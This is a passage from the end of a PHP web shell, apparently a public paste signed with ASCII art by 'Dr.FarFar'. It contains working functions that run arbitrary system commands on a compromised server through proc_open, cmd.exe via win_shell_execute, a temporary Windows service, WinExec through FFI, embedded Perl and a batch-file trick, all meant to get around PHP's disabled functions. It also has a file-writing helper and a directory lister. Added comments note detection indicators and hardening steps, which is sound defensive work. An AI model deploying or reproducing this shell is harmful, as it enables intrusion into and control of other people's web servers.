 * The process handle and both pipes are never closed.
 *
 * @param string $com Command line.
 * @param string $dir Working directory for the child process.
 * @return string|false Captured standard output.
 */
function proc_exec($com , $dir) {
    // Descriptors 0 and 1 are both declared as pipes opened in "w" mode.
    $start_pipe=array(0=>array("pipe","w"),1=>array("pipe","w"));
    $process=proc_open($com,$start_pipe,$pipes,$dir,NULL);
    return stream_get_contents($pipes[1]);
}
/**
 * Windows back-end: starts cmd.exe through win_shell_execute() with the
 * output redirected into a scratch file, waits one second, then reads and
 * deletes that file.
 *
 * NOTE(review): win_shell_execute() is presumably provided by an optional
 * Windows PECL extension - confirm which one is loaded.
 *
 * Defender notes: the scratch file is named "NJ" plus a uniqid() suffix
 * in the directory returned by whereistmP(); cmd.exe started by the
 * web-server process is the process-level indicator.
 *
 * @param string $command Command line to run.
 * @return string|false Captured output.
 */
function winshell($command) {
    $name=whereistmP()."\\".uniqid('NJ');
    win_shell_execute('cmd.exe','',"/C $command >\"$name\"");
    // Fixed one-second wait instead of waiting for the process to finish.
    sleep(1);
    $exec=file_get_contents($name);
    DeleteFile($name);
    return $exec;
}
/**
 * Windows back-end: registers a throw-away Windows service whose binary
 * is the command interpreter, starts it, then stops and deletes it, and
 * reads the command's redirected output from a scratch file.
 *
 * Defender notes: service creation and deletion by the web-server account
 * is recorded in the Windows event logs; the service name here is "NJ"
 * plus a uniqid() suffix, and the interpreter path falls back to
 * d:\windows\system32\cmd.exe when ComSpec is not set.
 *
 * @param string $command Command line to run.
 * @return string|false Captured output.
 */
function srvshell($command) {
    $name=whereistmP()."\\".uniqid('NJ');
    $n=uniqid('NJ');
    $cmd=(empty($_SERVER['ComSpec']))?'d:\\windows\\system32\\cmd.exe':$_SERVER['ComSpec'];
    win32_create_service(array('service'=>$n,'display'=>$n,'path'=>$cmd,'params'=>"/c $command >\"$name\""));
    win32_start_service($n);
    win32_stop_service($n);
    win32_delete_service($n);
    // Polls once per second with no timeout until the output file appears.
    while(!file_exists($name))sleep(1);
    $exec=file_get_contents($name);
    DeleteFile($name);
    return $exec;
}
/**
 * Windows back-end: binds WinExec from kernel32.dll through an ffi object
 * and uses it to start cmd.exe with output redirected to a scratch file.
 *
 * NOTE(review): the lowercase ffi class with a "[lib=...]" declaration
 * looks like the old PECL ffi extension rather than the FFI class bundled
 * with PHP 7.4 and later - confirm.
 *
 * Defender notes: do not load foreign-function extensions on web hosts;
 * where PHP's bundled FFI is present, keep ffi.enable at its restrictive
 * setting.
 *
 * @param string $command Command line to run.
 * @return string|false Captured output.
 */
function ffishell($command) {
    $name=whereistmP()."\\".uniqid('NJ');
    $api=new ffi("[lib='kernel32.dll'] int WinExec(char *APP,int SW);");
    // Second argument 0 is the window show state passed to WinExec.
    $res=$api->WinExec("cmd.exe /c $command >\"$name\"",0);
    // Polls once per second with no timeout until the output file appears.
    while(!file_exists($name))sleep(1);
    $exec=file_get_contents($name);
    DeleteFile($name);
    return $exec;
}
/**
 * Back-end that runs the command through an embedded Perl interpreter and
 * captures what it prints with output buffering.
 *
 * $command is spliced into a single-quoted Perl string.
 * NOTE(review): the perl class is presumably supplied by an optional PECL
 * extension - confirm.
 *
 * Defender notes: an embedded-interpreter extension is an execution path
 * that disable_functions does not cover; leave such extensions unloaded.
 *
 * @param string $command Command line to run.
 * @return string|false Buffered output.
 */
function perlshell($command) {
    $perl=new perl();
    ob_start();
    $perl->eval("system('".$command."')");
    $exec=ob_get_contents();
    ob_end_clean();
    return $exec;
}
/**
 * Windows back-end that writes the command into a batch file, launches
 * the batch file, and reads the redirected output back.
 *
 * The output file is read immediately after exec() returns, and cmd.bat
 * is left on disk.
 *
 * Defender notes: cmd.bat and sy3.txt in the working directory are fixed
 * file names, which makes them direct file-system indicators of this
 * shell.
 *
 * @param string $cmd Command line to run.
 * @return string|false Contents of sy3.txt.
 */
function slashBypass($cmd) {
    GenerateFile("cmd.bat","$cmd>sy3.txt"."\r\n exit");
    exec("\start cmd.bat");
    $content = file_get_contents('sy3.txt');
    unlink('sy3.txt');
    return $content;
}
/**
 * Writes $content to the file $name, trying fwrite(), fputs() and
 * file_put_contents() in turn, depending on which functions exist.
 *
 * The file is opened in "w+" mode, so existing content is truncated. The
 * handle is not closed on the early "write failed" return, and the
 * file_put_contents() branch passes the handle where a file name is
 * expected.
 *
 * Defender notes: this is the shell's file-drop primitive; web roots that
 * the web-server account cannot write to, plus execution disabled in
 * upload directories, limit what it can achieve.
 *
 * @param string $name    Target file name.
 * @param string $content Data to write.
 * @return bool|null True on success, false on failure, null when fopen()
 *                   or fclose() is unavailable.
 */
function GenerateFile($name,$content) {
    if(function_exists('fopen') && function_exists('fclose')) {
        $file = fopen($name,"w+");
        if($file) {
            if(function_exists('fwrite')){$writeFile = fwrite($file,$content); }   
            else if (function_exists('fputs')){$writeFile = fputs($file,$content); }
            else if (function_exists('file_put_contents')){$writeFile = file_put_contents($file,$content);}
            // A write of zero bytes is also treated as failure.
            if(!$writeFile){return false;}
        }
        else{return false;}fclose($file);return true;
    }
}
/**
 * Produces the shell's directory listing for the global $dir.
 *
 * In "cmd" mode the listing comes from an operating-system command run
 * through Exe(), which echoes its output, so this function returns null.
 * Otherwise a plain-text table is built from PHP's file functions, one
 * row per directory entry: permissions, size, change date, owner/group
 * ids, readable/writable flags, type and name.
 *
 * The directory handle is never closed, and the loose != comparison ends
 * the loop early on an entry named "0".
 *
 * @return string|null The listing text, or null in "cmd" mode.
 */
function ScanDirs() {
    global $os; global $dir;global $safeMode;global $dir_mode;
    if($dir_mode == "cmd"){if($os == "Windows"){Exe('dir');}else{ Exe('ls -lia');}}
    else {
        $result .= "Perms   Size    Time        Owner/Group R/W Type    File
-----------------------------------------------------------------------------
";
        $handel = opendir($dir);
        while(($file = readdir($handel))!= false)
        {
            $size = filesize($file);
            if(filetype($file) == "dir"){$type = "<DIR>";}else {$type = "<FILE>";}
            // A uid or gid of 0 is falsy, so root-owned entries show "NONE".
            if(fileowner($file)){$owner = fileowner($file);}else{$owner = "NONE";}
            if(filegroup($file)){$group = filegroup($file);}else{$group = "NONE";}
            // Raw integer mode, not an rwx string.
            $perms = fileperms($file);
            $time = date("y/m/d", filectime($file));
            if(is_writable($file)){$isWritable = "Y";}else{$isWritable = "N";}
            if(is_readable($file)){$isReadable = "Y";}else{$isReadable = "N";}
            $result .= $perms." ".$size."   ".$time."   ".$owner."/".$group."   ".$isReadable."/".$isWritable." ".$type."   ".$file."
";
        }
    }
    return $result;
}
// footer() echoes its own markup and returns nothing, so this echo itself prints nothing further.
echo footer();
?>
  1165.  
  1166. ########################################################################################################################
  1167.  
  1168.         https://www.facebook.com/Dr.FarFar
  1169.         http://Dr-FarFar.BlogSpot.com/
  1170.  
  1171.         ________         __________                __________                
  1172.         ___  __ \___________  ____/______ ____________  ____/______ _________
  1173.         __  / / /__  ___/__  /_    _  __ `/__  ___/__  /_    _  __ `/__  ___/
  1174.         _  /_/ / _  /___ _  __/    / /_/ / _  /    _  __/    / /_/ / _  /    
  1175.         /_____/  /_/ _(_)/_/       \__,_/  /_/     /_/       \__,_/  /_/    
  1176.                                                                              
  1177.                              ~\ Dr.FarFar /~